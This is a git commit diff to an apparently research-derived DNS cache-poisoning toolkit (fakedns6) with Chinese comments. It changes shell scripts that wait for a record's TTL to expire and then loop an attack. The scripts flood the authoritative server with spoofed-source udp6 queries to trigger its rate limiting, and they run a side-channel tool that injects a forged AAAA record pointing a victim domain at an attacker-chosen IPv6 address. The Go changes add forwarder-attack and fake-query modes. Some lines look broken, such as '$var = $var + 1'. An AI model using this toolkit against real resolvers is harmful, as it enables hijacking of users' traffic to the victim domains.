同步

7 files changed, 40 insertions, 25 deletions

diff --git a/attack.sh b/attack.sh
index 2b1a28d..07bcc46 100755
--- a/attack.sh
+++ b/attack.sh
@@ -6,29 +6,37 @@
 # Verify the existing record domain, just for proof purposes.
 echo '获取原记录中:'
 dig @$1 $4 AAAA
+sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
 
+num=0
 success=0
 while [ $success -ne 1 ]
 do
   success=0
-  echo '等待缓存过期，10秒之后开始攻击...'
-  sleep 10
+  echo "等待缓存过期，$sleeptime秒之后开始攻击..."
+  sleep $sleeptime
   echo "开始攻击"
   # flood
-  ret=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
-  echo "$ret"
+  echo "攻击参数："
+  echo "目标域名权威服务地址:$5"
+  echo "目标解析服务地址:$1"
+  echo "目标域名:$4"
+  ret=$(./dns_query.sh $1 $2 $3 $4)
+  #echo "ret:$ret"
   FINAL=`echo ${ret: -1}`
-  echo "$FINAL"
-  if [ "$FINAL" == "1" ];then
-	  success=1
-  fi
+  #echo "fin:$FINAL"
   # Start attack
   # Change the argument accordingly
-  #echo "执行侧信道攻击脚本中"
-  #time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+  echo "执行侧信道攻击脚本中"
+  time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
   # Validations
-  #echo '一轮次攻击结束'
+  $var = $var + 1
+  echo "第$var轮次攻击结束"
   #dig @$1 $4 AAAA
+  if [ "$FINAL" == "0" ];then
+	success=1
+	sleeptime=0
+  fi
   echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
 done
 # success
diff --git a/dns.bin b/dns.bin
index 11d5802..f5f0ce1 100644
--- a/dns.bin
+++ b/dns.bin
diff --git a/dns_mid.bin b/dns_mid.bin
index 10b3b3b..6365d80 100644
--- a/dns_mid.bin
+++ b/dns_mid.bin
@@ -1 +1 @@
-victimn64top
\ No newline at end of file
+existn64top
\ No newline at end of file
diff --git a/dns_query.sh b/dns_query.sh
index 36a18c5..a651eae 100755
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -1,11 +1,12 @@
-# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] [flag] space-separated-domain... (e.g. www google com)
+# usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
 # clear the previous files
 sleep 1
 echo "初始化工具环境"
 dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
 dd if=/dev/null of=txid.bin > /dev/null 2>&1
 # write the domain name into the binary
-for var in ${@:4}
+domains=$(echo $4| sed "s/\./ /g")
+for var in ${domains:0}
 do
   size=${#var}
   echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
@@ -21,11 +22,15 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 echo "尝试触发权威服务器请求速率限制"
 udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
 sleep 1
-a=$(($RANDOM % 10))
+a=$(($RANDOM % 9 + 1))
 echo "a:$a"
-if [ $a -gt 5 ]; then
-  ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
-  echo "1"
+if [ $a -gt 6 ]; then
+  #echo "dns-TIP:$1"
+  #echo "dns-WIP:$2"
+  #echo "dns-iface:$3"
+  #echo "dns-domain:$4"
+  ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
+  echo "0"
 fi
 
 
diff --git a/fakedns6 b/fakedns6
index 5b13e5c..0a3213f 100755
--- a/fakedns6
+++ b/fakedns6
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index 9837831..54183d2 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -454,11 +454,11 @@ func main() {
 	//auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
 	attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
 	debugOutput := flag.Bool("d", false, "Debug output mode.")
-	attackerMaliciousDomain := flag.String("f", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
+	attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
 	soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
 
 	//特殊用途
-	isfake := flag.String("F", "0", "")
+	isfake := flag.Int("f", 0, "")
 	flag.Parse()
 	//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
 	Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
@@ -468,23 +468,25 @@ func main() {
 
 func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
 	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
-	soaNameArg string, isfake string) {
+	soaNameArg string, isfake int) {
 	fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
-
 	// 特殊用途
-	if isfake == "1" {
+	if isfake == 1 {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		if strings.Contains(attackertargetIP, ":") {
+			println("目标："+resolverBackendIPArg.String())
 			ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
 			if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." {
 				victimDNSNameArg = victimDNSNameArg + "."
 			}
 			domain := ipcode + "." + victimDNSNameArg
 			msg.SetQuestion(domain, dns.TypeAAAA)
-			_, _, _ = c.Exchange(msg, resolverBackendIPArg.String())
+			_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(),"53"))
 			return
 		} else {
+			println(attackertargetIP)
+			println(victimDNSNameArg)
 			println("参数有误，请输入IPv6地址作为篡改目标结果")
 		}
 
diff --git a/txid.bin b/txid.bin
index ffb0f65..5d927fb 100644
--- a/txid.bin
+++ b/txid.bin
@@ -1 +1 @@
-U
\ No newline at end of file
+"Y
\ No newline at end of file